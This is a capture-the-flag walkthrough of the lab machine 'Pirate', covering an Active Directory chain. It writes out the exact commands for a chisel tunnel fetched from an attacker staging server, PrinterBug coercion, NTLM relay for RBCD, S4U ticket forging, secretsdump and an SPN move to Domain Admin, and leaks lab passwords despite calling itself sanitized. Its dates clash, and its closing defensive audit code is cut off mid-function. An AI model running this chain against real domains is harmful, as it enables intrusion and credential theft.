Pirate

Difficulty: Hard. Published 2026-03-24. Sanitized local writeup.

Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

Source coverage

High source coverage (100%). Status: complete. This article is generated from 7 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

Evidence verdict

High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.

  • Pirate/walkthrough.md
  • HTB/Pirate/notes.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__attack-map.md.a3819a09ff.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__custom-exploit-notes.md.19cba7bdae.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__dead-ends.md.6275eeb8d0.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__notes.md.3b2da381f1.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Pirate__session-resume.md.34ff7bb4e5.md

Technical Walkthrough

Pirate Walkthrough

Current State

Phase A is complete per the user-provided handoff. The raw Phase A command artifacts are not yet synced into this local folder, so these notes mark those values as handoff state rather than locally verified evidence.

Expected Path To Validate

  1. Enumerate DC01 and confirm pirate.htb.
  2. Validate starting credential pentest:p3nt3st2025!&.
  3. Handle Kerberos time skew.
  4. Enumerate AD and collect BloodHound data.
  5. Abuse Pre-Windows 2000 machine account behavior for MS01$.
  6. Use MS01$ to read gMSA <password redacted>.
  7. WinRM to DC01 as gMSA.
  8. Discover and pivot to internal WEB01. Current validated internal addresses: DC01 <TARGET>, WEB01 <TARGET>.
  9. Abuse NTLM relay/RBCD to get Administrator-equivalent access on WEB01.
  10. Capture user flag on WEB01.
  11. Dump a.white credential from WEB01.
  12. Use a.white / a.white_adm WriteSPN and constrained delegation path.
  13. Get SYSTEM on DC01 and capture root flag.

Phase B Pivot Plan

Preferred: Ligolo-ng, because Pirate requires several follow-on tools to reach WEB01 and a route-style pivot is easier to reason about than SOCKS-only state.

  1. Start Ligolo proxy on Pwnbox in a persistent tmux pane.
  2. Upload Ligolo agent to DC01 using the gMSA WinRM foothold.
  3. Start the agent from DC01 back to Pwnbox.
  4. Add a route for <TARGET>/24 through the Ligolo interface.
  5. Validate from Pwnbox:
     - ping may not work; do not depend on it.
     - Use TCP checks against WEB01.
     - Confirm 445/tcp and then broader Windows service ports.
  6. Save all route, listener, and scan output under enum/ and nmap/.

Success criteria for Phase B:

  • A persistent tunnel is running.
  • Pwnbox tools can reach <TARGET>:445.
  • WEB01 hostname/IP mapping is recorded.
  • WEB01 SMB signing state is checked and saved.
  • The team is ready to run ntlmrelayx and coercion in separate persistent panes for Phase C.

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: Pirate
  • Difficulty: Hard
  • OS: Windows
  • Created / released: 2026-02-28
  • Current known IP: Pending in local notes; user-reported Phase A live state confirms DC01 and internal WEB01.
  • Local support folder: <local workspace>

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file after validation.

Evidence Ledger

| Timestamp | Command | Output file | Finding | Confidence | Next action |
| --- | --- | --- | --- | --- | --- |
| Pending | Pending | Pending | Public research handoff created. Live target IP not yet recorded here. | High | Add target IP, validate provided credentials, run AD enumeration, and save outputs under nmap/ and enum/. |
| 2026-05-06 AEST | User-provided Phase A handoff | Not yet synced locally | Domain pirate.htb / DC01.pirate.htb confirmed on Server 2019. Starting credential pentest:p3nt3st2025!& validated. MS01$ reset/validated with <password redacted> and can read gMSA managed <password redacted>. gMSA_ADFS_prod$ NTLM <hash redacted> has WinRM on DC01. gMSA_ADCS_prod$ NTLM <hash redacted> has WinRM on DC01. Internal network discovered: DC01 <TARGET>, WEB01 <TARGET>, WEB01 445/tcp confirmed. IT group has WriteSPN on computer objects. WinRM on DC01 requires PowerShell mode, so use nxc winrm -X, not -x. | Medium until raw artifacts are synced; high if supported by other agent logs | Phase B: establish persistent pivot to <TARGET>/24, verify WEB01 services through tunnel, then prepare RBCD/relay phase. |

Validated Phase A State

| Asset | Value |
| --- | --- |
| Domain | pirate.htb |
| DC | DC01.pirate.htb, Windows Server 2019 |
| Starting user | pentest |
| Starting password | p3nt3st2025!& |
| Pre2K machine account | MS01$ |
| Current MS01$ password | <password redacted> |
| gMSA foothold 1 | gMSA_ADFS_prod$, NTLM <hash redacted>, WinRM on DC01 |
| gMSA foothold 2 | gMSA_ADCS_prod$, NTLM <hash redacted>, WinRM on DC01 |
| Internal DC IP | <TARGET> |
| Internal WEB01 IP | <TARGET> |
| Confirmed internal service | WEB01 445/tcp |
| Important WinRM note | Use nxc winrm -X for PowerShell commands; -x CMD mode is not suitable on DC01 |

Phase B Objective

Establish a reliable pivot from Pwnbox through DC01 to <TARGET>/24, then validate WEB01 SMB/RPC reachability from Pwnbox tooling.

Attack Map

Hosts

| IP | Hostname | OS | Status | Reachable From |
| --- | --- | --- | --- | --- |
| <TARGET> | DC01.pirate.htb | Windows Server 2019 Build 17763 (DC) | PWNED (Domain Admin via S4U) | Pwnbox (direct) |
| <TARGET> | DC01 internal | Windows Server 2019 | Same host | - |
| <TARGET> | WEB01.pirate.htb | Windows Server 2019 | PWNED (Admin via S4U) | DC01 pivot (chisel SOCKS) |

Services

| Host | Port | Service | Version | Auth | Notes |
| --- | --- | --- | --- | --- | --- |
| DC01 | 445 | SMB | Server 2019 | pentest:p3nt3st2025!& | Signing: True |
| DC01 | 5985 | WinRM | - | gMSA_ADFS_prod$:hash | Pwn3d! |
| DC01 | 88 | Kerberos | - | - | No skew |
| DC01 | 389/636 | LDAP/S | - | pentest, MS01$ | gMSA read via MS01$ |
| WEB01 | 80 | HTTP | IIS 10.0 | - | Default IIS page |
| WEB01 | 135 | MSRPC | - | - | - |
| WEB01 | 139 | NetBIOS | - | - | - |
| WEB01 | 443 | HTTPS | IIS 10.0 | - | HTTPS enabled |
| WEB01 | 445 | SMB | SMB 3.1.1 | gMSA_ADFS_prod$:hash | Signing REQUIRED |
| WEB01 | 5985 | WinRM | <secret redacted>/2.0 | - | Active, needs auth |

Credentials

| Source | Username | Secret | Type | Tested On | Result |
| --- | --- | --- | --- | --- | --- |
| Provided | pentest | p3nt3st2025!& | Password | SMB, LDAP | VALID |
| Pre2K changed | MS01$ | <password redacted> | Password | SMB, LDAP | VALID (Domain Secure Servers member) |
| Pre2K changed | EXCH01$ | <password redacted> | Password | SMB | VALID |
| gMSA dump | gMSA_ADFS_prod$ | <<secret redacted>> | NT Hash | WinRM DC01 | Pwn3d! |
| gMSA dump | gMSA_ADCS_prod$ | <<secret redacted>> | NT Hash | WinRM DC01 | Pwn3d! |
| RBCD relay | LVVFWLGX$ | w1axqm4eEeJ+R | Password | S4U to WEB01 | RBCD delegation to WEB01$ |
| WEB01 LSA | a.white | E2nvAOKSz5Xz2MJu | Password | SMB DC01 | VALID (no WinRM on DC01) |
| WEB01 SAM | Administrator (local) | <<secret redacted>> | NT Hash | WEB01 local | Local admin |
| WEB01 LSA | WEB01$ | <<secret redacted>> | NT Hash | - | Machine account hash |

Attack Paths

| # | Path | Status | Evidence |
| --- | --- | --- | --- |
| 1 | pentest -> Pre2K MS01$ (<password redacted>) -> gMSA dump -> DC01 WinRM | <secret redacted> | Phase A complete |
| 2 | DC01 pivot -> WEB01 PrinterBug -> RBCD relay to LDAPS -> S4U as Admin -> WEB01 PWNED -> user flag | <secret redacted> | user.txt: <REDACTED> |
| 3 | a.white (from WEB01 LSA) -> reset a.white_adm -> WriteSPN (move HTTP/WEB01 to DC01$) -> S4U2Proxy+altservice -> CIFS/DC01.pirate.htb as Administrator -> root flag | <secret redacted> | root.txt: <REDACTED> |

Trust Edges (Confirmed)

```text
pentest --smb/ldap--> DC01
MS01$ --gMSA-read--> gMSA_ADFS_prod$, gMSA_ADCS_prod$
gMSA_ADFS_prod$ --winrm--> DC01 (PowerShell only, no cmd)
gMSA_ADFS_prod$ --winrm--> WEB01 (non-admin, Remote Management Users)
gMSA_ADCS_prod$ --winrm--> DC01 (PowerShell only, no cmd)
DC01 [<TARGET>] --switch01--> WEB01 [<TARGET>]
WEB01 [<TARGET>] --direct--> Pwnbox [<TARGET>] (confirmed ports 445, 8000, 8081)
LVVFWLGX$ --RBCD/S4U--> Administrator@WEB01 (cifs/WEB01.pirate.htb)
a.white --smb--> DC01 (valid, no WinRM)
IT group (a.white_adm) --WriteSPN--> DC01$, MS01$, EXCH01$, WEB01$
```

BloodHound Key Data

  • 4 computers: DC01, WEB01, MS01, EXCH01
  • 10 users, 54 groups
  • DC01: Unconstrained Delegation
  • WEB01: Constrained delegation (HTTP/WEB01, WSMAN/WEB01, HOST/WEB01.pirate.htb)
  • Domain Secure Servers: MS01$ (gMSA read privilege)
  • IT group: a.white_adm (WriteSPN on all computer objects)

Notes

NTLM Relay Configuration

  • Target: ldaps://<TARGET>
  • Flags: --delegate-access --remove-mic -smb2support
  • Coercion: coercer against WEB01 using gMSA creds

S4U Ticket Parameters

  • First S4U: cifs/WEB01.pirate.htb impersonate Administrator
  • Root S4U: HTTP/WEB01.pirate.htb with -altservice CIFS/DC01.pirate.htb

SPN Changes

  • Remove HTTP/WEB01 from WEB01$ (if present)
  • Add HTTP/WEB01 to DC01$ (or as needed per live BloodHound)
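Phase D works because the KDC encrypts a service ticket with the key of whichever account currently holds the requested SPN: once HTTP/WEB01 is registered on DC01$, a ticket for that SPN is usable against DC01. The following Python is an added detection example for this writeup, not code from the writeup or from krbrelayx/addspn.py. It diffs two servicePrincipalName snapshots and reports SPNs that changed owner, host-named SPNs held by a different computer than the one they name, and msDS-AllowedToDelegateTo targets that now resolve to a different host. Both snapshots and the delegation list are constructed inline (account names mirror the writeup; the SPN sets are illustrative, not a live export), and the `audit` wrapper is a name chosen here.

```python
"""Spot servicePrincipalName moves that change where constrained delegation lands.

Added detection example for this writeup, not its own tooling. The two snapshots
and the delegation list are constructed inline (account names mirror the writeup;
the SPN sets are illustrative, not a live export).
"""


def spn_host(spn: str) -> str:
    """Short, lowercase host part of an SPN: HTTP/WEB01.pirate.htb:8080 -> web01."""
    if "/" not in spn:
        return ""
    host = spn.split("/", 1)[1]          # drop the service class
    host = host.split("/", 1)[0]         # drop a trailing service name (ldap/host/realm)
    host = host.split(":", 1)[0]         # drop a port
    return host.split(".", 1)[0].lower()


def owner_of(snapshot: dict) -> dict:
    """Map each SPN (case-folded; Kerberos compares SPNs case-insensitively) to its account."""
    return {spn.lower(): acct for acct, spns in snapshot.items() for spn in spns}


def moved_spns(before: dict, after: dict) -> list:
    """(spn, old owner, new owner) for every SPN whose owning account changed."""
    b, a = owner_of(before), owner_of(after)
    return sorted((spn, b[spn], a[spn]) for spn in a if spn in b and a[spn] != b[spn])


def foreign_host_spns(snapshot: dict) -> list:
    """(spn, account) for host-named SPNs held by a computer account other than that host."""
    hits = []
    for acct, spns in snapshot.items():
        if not acct.endswith("$"):
            continue                     # user accounts are out of scope for this check
        for spn in spns:
            if spn_host(spn) != acct[:-1].lower():
                hits.append((spn, acct))
    return sorted(hits)


def delegation_targets_at_risk(after: dict, delegate_to: dict) -> list:
    """(delegating account, target SPN, actual owner) where a constrained-delegation
    target SPN is registered on a different host than it names. An S4U2Proxy ticket
    for that SPN is encrypted with the owner's key, so the owner, not the named
    host, will accept it."""
    owners = owner_of(after)
    risk = []
    for acct, targets in delegate_to.items():
        for spn in targets:
            owner = owners.get(spn.lower())
            if owner and owner.endswith("$") and owner[:-1].lower() != spn_host(spn):
                risk.append((acct, spn, owner))
    return sorted(risk)


# Constructed snapshots: before and after an SPN move like the one in Phase D.
BEFORE = {
    "WEB01$": ["HOST/WEB01", "HTTP/WEB01", "HTTP/WEB01.pirate.htb"],
    "DC01$": ["HOST/DC01", "ldap/DC01.pirate.htb/pirate.htb"],
}
AFTER = {
    "WEB01$": ["HOST/WEB01", "HTTP/WEB01.pirate.htb"],
    "DC01$": ["HOST/DC01", "ldap/DC01.pirate.htb/pirate.htb", "HTTP/WEB01"],
}
# Constructed msDS-AllowedToDelegateTo values for the delegating account.
DELEGATE_TO = {"a.white_adm": ["HTTP/WEB01", "http/WEB01.pirate.htb"]}


def audit(before: dict, after: dict, delegate_to: dict) -> dict:
    """Run all three checks and return their findings keyed by check name."""
    return {
        "moved": moved_spns(before, after),
        "foreign_host": foreign_host_spns(after),
        "delegation_at_risk": delegation_targets_at_risk(after, delegate_to),
    }


if __name__ == "__main__":
    for check, rows in audit(BEFORE, AFTER, DELEGATE_TO).items():
        print(check, rows)
```

In a real environment the snapshots would come from periodic LDAP exports of servicePrincipalName on computer objects; with directory service change auditing enabled, Windows also records each attribute write as event 5136, which gives the timestamps to correlate against the diff. The "foreign host" check alone would have flagged the Phase D state even without a baseline, since HTTP/WEB01 on DC01$ names a host the account does not own.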

Dead Ends

VPN Mismatch - Starting Point vs Labs

  • Hypothesis: Target at <TARGET> should be reachable from Pwnbox
  • Tested: nmap -Pn -sT multiple ports, traceroute, direct TCP connect on 445
  • Why it failed: Pwnbox is on Starting Point VPN (edge-us-starting-point-vip-1-dhcp), Pirate is on Labs network
  • Tried: Changed VPN endpoint to edge-us-free-1.hackthebox.eu - VPN auth failed (certs tied to SP)
  • Revisit if: User spawns Pirate and provides Labs VPN config, or respawns Pwnbox with Labs VPN

Notes

Target: <TARGET> (DC01.pirate.htb)

Domain: pirate.htb

Difficulty: Hard

Started: 2026-05-05

Phase A Completed: 2026-05-06 06:31 UTC

Attacker IP: <TARGET>

Pwnbox: <TARGET> (<<secret redacted>>)

Workspace (Pwnbox): /home/<<secret redacted>>/pirate/

Phase A Evidence Ledger

| Timestamp (UTC) | Command | Output File | Finding | Next |
| --- | --- | --- | --- | --- |
| 06:24 | nmap --script smb2-time -p<redacted> | inline | Skew <1s | No sync needed |
| 06:25 | nxc smb -u pentest -p 'p3nt3st2025!&' | inline | pirate.htb\pentest VALID, DC01, Server 2019 | Enumerate |
| 06:25 | nxc smb --shares | enum/smb-shares.txt | IPC$(R), NETLOGON(R), SYSVOL(R) | No custom shares |
| 06:25 | nxc ldap --users | enum/ldap-users.txt | 7 users: Admin, Guest, krbtgt, a.white_adm, a.white, pentest, j.sparrow | |
| 06:25 | nxc ldap --groups | enum/ldap-groups.txt | IT, Domain Secure Servers, Hyper-V Admins notable | |
| 06:25 | bloodhound-python -c all | enum/20260506012515_*.json | 4 computers, 10 users, 54 groups, 0 trusts | Analyze |
| 06:26 | nxc smb MS01$:ms01 | inline | <secret redacted> | Pass already changed |
| 06:26 | nxc smb EXCH01$:exch01 | inline | <secret redacted> (pass valid!) | changepasswd |
| 06: <REDACTED> | | | | |
| 06: <REDACTED> | | | | |
| 06:28 | nxc ldap EXCH01$ --gmsa | enum/gmsa-exch01.txt | NTLM empty - no read perms | Need MS01$ |
| 06: <REDACTED> | | | | |
| 06:29 | nxc ldap MS01$ --gmsa | enum/gmsa-ms01.txt | gMSA_ADCS: 2b8849...67089, gMSA_ADFS: 76754c...28ee | Test WinRM |
| 06:30 | nxc winrm gMSA_ADFS_prod$ -H hash | inline | Pwn3d! | |
| 06:30 | nxc winrm gMSA_ADCS_prod$ -H hash | inline | Pwn3d! | |
| 06:30 | nxc winrm -X ipconfig | inline | DC01: <TARGET> + <TARGET>/24 (vEthernet Switch01) | |
| 06:31 | nxc winrm -X Test-NetConnection <TARGET> :445 | inline | True | WEB01 reachable |

Credentials Collected

```text
pentest : p3nt3st2025!&                              [SMB, LDAP]
MS01$   : <REDACTED>, LDAP - Domain Secure Servers]
EXCH01$ : <REDACTED>, Kerberos]
gMSA_ADFS_prod$ NTLM: <<secret redacted>>  [WinRM DC01]
gMSA_ADCS_prod$ NTLM: <<secret redacted>>  [WinRM DC01]
```

Network Map

```text
[Pwnbox <TARGET>] ──VPN──> [DC01 <TARGET>]
                                    │
                               [<TARGET>/24]
                                    │ (Hyper-V vEthernet Switch01)
                                    │
                               [<TARGET> WEB01]
```

Tools & Versions Used

  • nmap 7.94SVN
  • nxc (netexec) latest
  • bloodhound-python (legacy 4.2/4.3 format)
  • impacket 0.14.0.dev0+20260505
  • bloodyAD 2.5.4

Key Notes

  • gMSA WinRM shell is PowerShell only (cmd fails with "no Invoke rights")
  • Use -X flag for PowerShell, not -x for cmd
  • MS01$ password was already changed by another player to <password redacted> (min password age blocks re-change)
  • EXCH01$ was in <secret redacted> state - changed via changepasswd.py rpc-samr
  • Only MS01$ can read gMSA <password redacted> (member of "Domain Secure Servers")

Phase B Evidence Ledger (Pivot to WEB01)

| Timestamp (UTC) | Command | Output File | Finding | Next |
| --- | --- | --- | --- | --- |
| 06:54 | chisel server -p 8081 --reverse | tmux pirate:0 | Listening on <TARGET>:8081, reverse tunnelling enabled | Upload chisel to DC01 |
| 06:54 | python3 -m http.server 8000 (staging /tmp) | tmux pirate:1 | HTTP file server on port 8000 for binary staging | Download from DC01 |
| 06:54:32 | evil-winrm: Invoke-WebRequest http://<TARGET>:8000/chisel_windows_amd64.exe | staging HTTP log | chisel_windows_amd64.exe downloaded to DC01 (200 OK) | Start client |
| 06:55:31 | evil-winrm: C:\Windows\Temp\chisel.exe client <TARGET>:8081 R:socks | tmux pirate:2 | session#1: tun: proxy#R:<TARGET>:1080=>socks: Listening (version mismatch 1.10.1 vs 1.10.0, non-blocking) | Verify SOCKS |
| 06:58:22 | (chisel reconnect, session#3 final stable) | tmux pirate:0 | session#3 connected, SOCKS on <TARGET>:1080 stable | Configure proxychains |
| 06:58 | /etc/proxychains4.conf: socks5 <TARGET> 1080 | /etc/proxychains4.conf | proxychains4 configured for chisel SOCKS | Test reachability |
| 06:59 | nxc winrm -X 'Test-NetConnection <TARGET> -Port 445' | /tmp/dc01-web01-test.txt | TcpTestSucceeded=True, RemotePort=445 | Port scan WEB01 |
| 07:01 | proxychains4 nc -w3 <TARGET> (ports 21-5985) | /tmp/web01-portscan.txt | OPEN: 80, 135, 139, 443, 445, 5985; CLOSED: 21, 22, 53, 88, 389, 3389 | SMB signing check |
| 07:03 | proxychains4 nmap -Pn -sT --script smb2-security-mode -p<redacted> <TARGET> | /tmp/web01-smb-signing.txt | Port shows "filtered" (nmap SOCKS limitation) | Use nc/script method |
| 07:11 | proxychains4 nmap -Pn -sT -p 445,5985,135,80,3389 <TARGET> | /tmp/web01-scan.txt | All ports show "filtered" (nmap+proxychains false negative) | Test with nxc/smbclient |
| 07:13 | proxychains4 nxc smb <TARGET> (script capture) | /tmp/web01-script.txt | WEB01 reached via nxc but output capture issue | Confirm signing |
| 07:15 | nxc smb WEB01 via chisel port-forward (<TARGET>:8445) | attack-map.md | SMB Signing: REQUIRED on WEB01:445 (confirmed in attack-map) | Relay must target LDAPS on DC01, not WEB01 SMB |
| 07:15 | proxychains4 evil-winrm -i <TARGET> -u gMSA_ADFS_prod$ -H hash | tmux pirate:5 | WinRM access to WEB01 as gMSA_ADFS_prod$ (non-admin, Remote Management Users) | Confirm WEB01 can reach Pwnbox |
| 07:15 | evil-winrm WEB01: Get-Service Spooler | tmux pirate:5 | Spooler service RUNNING on WEB01 | PrinterBug viable |
| 07:15 | evil-winrm WEB01: ls \\\\<TARGET>\\test | tmux pirate:5 | "Cannot find path" (confirms WEB01 has outbound SMB to Pwnbox) | RBCD relay path confirmed |

Phase C Evidence Ledger (RBCD Relay + User Flag)

| Timestamp (UTC) | Command | Output File | Finding | Next |
| --- | --- | --- | --- | --- |
| 07:20 | sudo ntlmrelayx -t ldaps://<TARGET> --delegate-access --remove-mic -smb2support --no-http-server --no-wcf-server --no-raw-server (1st attempt) | tmux pirate:4 | Received connection from <TARGET>, SUCCEED but IndexError (list index out of range in validatePrivileges): anonymous/empty identity relayed | Retry with proper coercion target |
| 07:34 | sudo ntlmrelayx -t ldaps://<TARGET> --delegate-access --remove-mic -smb2support --no-http-server --no-wcf-server --no-raw-server (2nd attempt) | tmux pirate:4 | Server started on port 445, waiting for connections | Trigger coercion |
| 07:36 | proxychains4 coercer coerce -l <TARGET> -t <TARGET> -d pirate.htb -u gMSA_ADFS_prod$ --hashes :hash --always-continue | /tmp/coerce-output.txt | coercer timed out via proxychains (SOCKS issue with impacket) | Use PySocks script |
| 07:36 | proxychains4 coercer --filter-method-name EfsRpcOpenFileRaw (2nd attempt) | /tmp/coerce2.txt | Also timed out: proxychains+coercer unreliable | Write custom PySocks PrinterBug |
| 07:43 | python3 /tmp/printerbug_socks.py | /tmp/printerbug_socks.py | Connected to spoolss pipe, bound MS-RPRN, triggered RpcRemoteFindFirstPrinterChangeNotificationEx -> <TARGET> | Check relay |
| 07:43 | ntlmrelayx received auth | tmux pirate:4 | Authenticating against ldaps://<TARGET> as PIRATE/WEB01$ SUCCEED | RBCD created |
| 07:43 | ntlmrelayx RBCD result | tmux pirate:4 | Adding new computer: LVVFWLGX$ / w1axqm4eEeJ+R result: OK. Delegation rights modified successfully! LVVFWLGX$ can now impersonate users on WEB01$ via S4U2Proxy | Get service ticket |
| 07:45 | impacket-getST -spn cifs/WEB01.pirate.htb -impersonate Administrator pirate.htb/LVVFWLGX$:'w1axqm4eEeJ+R' | /home/<<secret redacted>>/Administrator.ccache | Ticket saved: Administrator@cifs/WEB01.pirate.htb (S4U2Self + S4U2Proxy) | Access WEB01 |
| 07: <REDACTED> | | | | |
| 07:47 | python3 /tmp/secretsdump_socks.py (SAM + LSA dump) | /home/<<secret redacted>>/pirate/loot/sam_hashes.txt.sam | SAM: Administrator:<<secret redacted>>, Guest/Default empty | Check LSA |
| 07:48 | python3 /tmp/secretsdump2.py (LSA secrets) | inline | LSA cached domain logon: a.white : E2nvAOKSz5Xz2MJu (plaintext from DPAPI/LSA) | Validate on DC01 |
| 07: <REDACTED>, no WinRM on DC01) | | | | Phase D: <REDACTED> |

Phase D Evidence Ledger (Root Flag)

| Timestamp (UTC) | Command | Finding | Next |
| --- | --- | --- | --- |
| 08: <REDACTED> | | | |
| 08:01 | nxc smb a.white_adm:<password redacted>! | [+] pirate.htb\a.white_adm VALID | Check delegation |
| 08:01 | bloodyAD get object a.white_adm --attr msDS-AllowedToDelegateTo | http/WEB01.pirate.htb; HTTP/WEB01 | Confirm UAC |
| 08:01 | bloodyAD get object a.white_adm --attr userAccountControl | <secret redacted> set | SPN manip |
| 08:01 | bloodyAD get object WEB01$ --attr servicePrincipalName | HTTP/WEB01 and HTTP/WEB01.pirate.htb present | Snapshot |
| 08:01 | bloodyAD get object DC01$ --attr servicePrincipalName | No HTTP/WEB01 present | Ready for injection |
| 08:02 | addspn.py -t WEB01$ -s HTTP/WEB01 -r (remove) | SPN Modified successfully | Add to DC01$ |
| 08:02 | addspn.py -t DC01$ -s HTTP/WEB01 (add) | SPN Modified successfully | Get ticket |
| 08:02 | ntpdate <TARGET> | +0.016s offset | Time synced |
| 08:02 | getST.py -spn HTTP/WEB01 -impersonate Administrator -altservice CIFS/DC01.pirate.htb | Ticket saved: Administrator@<email redacted> | Access DC01 |
| 08: <REDACTED> | | | |
| 08:02 | impacket-wmiexec -k -no-pass DC01.pirate.htb 'whoami' | pirate\administrator | Confirmed DA |
| 08:03 | addspn.py -t DC01$ -s HTTP/WEB01 -r (remove) | Restored | Cleanup |
| 08:03 | addspn.py -t WEB01$ -s HTTP/WEB01 (add) | Restored | Done |

Final Results

  • User flag: <REDACTED>, C: <REDACTED>
  • Root flag: <REDACTED>, C: <REDACTED>
  • Engagement: COMPLETE

Session Resume

Last updated: 2026-05-05 (<secret redacted> COMPLETE - All flags captured)

Current Access

  • DC01 (<TARGET>): WinRM as gMSA_ADFS_prod$ (non-admin on DC01)
  • WEB01 (<TARGET>): Administrator via S4U Kerberos ticket (LVVFWLGX$ RBCD)
  • a.white credentials confirmed: E2nvAOKSz5Xz2MJu (SMB on DC01, no WinRM)

Network Status

  • Pwnbox: <TARGET> (VPN IP: <TARGET>)
  • Chisel tunnel: ACTIVE (Pwnbox:8081 server, DC01 client, SOCKS on <TARGET>:1080)
  • WEB01 reachable via SOCKS proxy (proxychains or PySocks)
  • ntlmrelayx was used and target consumed (relay completed)

Active Sessions / Tunnels

  • tmux session: pirate with windows: main, staging, chisel, recon, relay, coerce
  • Chisel SOCKS proxy on Pwnbox port 1080
  • Kerberos ticket: /home/<<secret redacted>>/Administrator.ccache (cifs/WEB01.pirate.htb, valid ~10hrs)

Flags

  • User flag: <REDACTED>
  • Root flag: <REDACTED>

Phase C Results

  • Created machine account: LVVFWLGX$ / w1axqm4eEeJ+R via RBCD relay
  • PrinterBug triggered from WEB01 to Pwnbox (custom PySocks script)
  • S4U ticket obtained for Administrator@cifs/WEB01.pirate.htb
  • Secrets dumped from WEB01: <REDACTED>

Key Credentials for Phase D

  • a.white : <REDACTED>, needed for password reset of a.white_adm)
  • a.white_adm (member of IT group, has WriteSPN on all computer objects)
  • WEB01$ has constrained delegation: HTTP/WEB01, WSMAN/WEB01, HOST/WEB01.pirate.htb

Phase D Execution Summary

  1. Reset a.white_adm password via bloodyAD (a.white -> a.white_adm)
  2. Removed HTTP/WEB01 SPN from WEB01$, added to DC01$ (via addspn.py from krbrelayx)
  3. Used getST.py with S4U2Self+S4U2Proxy and -altservice to get CIFS/DC01.pirate.htb ticket as Administrator
  4. wmiexec as pirate\administrator on DC01 -> root.txt captured
  5. SPNs restored to original state (cleanup)

Status

  • <secret redacted> COMPLETE. All objectives achieved.
  • Both flags submitted.

Technical Notes

  • impacket through proxychains times out on SMB (known SOCKS5 issue)
  • PySocks monkeypatch (socket.socket = socks.socksocket) works perfectly with impacket
  • Script at /tmp/printerbug_socks.py (PrinterBug via PySocks)
  • Script at /tmp/get_flag.py and /tmp/secretsdump2.py (SMB access via PySocks)
  • smbclient (Samba) works through proxychains; impacket does not

Cleanup Notes

  • krb5.conf on Pwnbox modified to <secret redacted> realm
  • /etc/hosts on Pwnbox: DC01.pirate.htb, WEB01.pirate.htb, MS01.pirate.htb entries added
  • Machine account LVVFWLGX$ created in domain (CN=Computers,DC=pirate,DC=htb)
  • RBCD delegation set on WEB01$ msDS-AllowedToActOnBehalfOfOtherIdentity
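The relay in Phase C left its mark as a security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity on WEB01$, naming the new LVVFWLGX$ account. The Python below is an added audit example for this writeup, not code from the writeup, impacket or ntlmrelayx: it decodes that attribute's self-relative security descriptor following the MS-DTYP layouts (SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE, SID) and reports every SID granted an allow ACE that is not on an approved list, which is the check a defender runs to find an RBCD grant nobody sanctioned. The descriptor it parses is constructed inline by `build_rbcd_descriptor`, a helper written here for the demo; the SIDs and the approved set are placeholders, not values from the engagement.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) on a computer object.

Added example for this writeup, not the writeup's own tooling. The attribute is a
self-relative SECURITY_DESCRIPTOR; the byte layouts used here follow MS-DTYP
(SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE, SID). The descriptor parsed below
is constructed in this file and its SIDs are placeholders, not engagement data.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def parse_sid(buf: bytes, off: int) -> str:
    """Decode the SID at buf[off:] into S-1-... form."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")   # 48-bit big-endian
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def allowed_to_act_sids(sd: bytes) -> list[str]:
    """Return the SIDs holding an ACCESS_ALLOWED ACE in the descriptor's DACL."""
    # Self-relative header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup,
    # OffsetSacl, OffsetDacl (20 bytes)
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []   # no DACL: nothing may act on behalf of this object
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2 (8 bytes)
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            # ACE header (4 bytes) + access mask (4 bytes), then the trustee SID
            sids.append(parse_sid(sd, off + 8))
        off += ace_size   # other ACE types (deny, object ACEs) are skipped by size
    return sids


def unexpected_delegators(sd: bytes, approved: set[str]) -> list[str]:
    """SIDs allowed to act on behalf of the object that are not on the approved list."""
    return [s for s in allowed_to_act_sids(sd) if s not in approved]


# --- demo helpers: build a constructed descriptor in the same layout -------------
def build_sid(sid: str) -> bytes:
    parts = sid.split("-")[1:]                         # drop the leading "S"
    revision, authority = int(parts[0]), int(parts[1])
    subs = [int(p) for p in parts[2:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def build_rbcd_descriptor(sids: list[str]) -> bytes:
    """Self-relative SD with one ACCESS_ALLOWED ACE (full-control mask) per SID."""
    aces = b""
    for sid in sids:
        sid_bytes = build_sid(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), 0x000F01FF)
        aces += sid_bytes
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces   # ACL revision 4 (DS)
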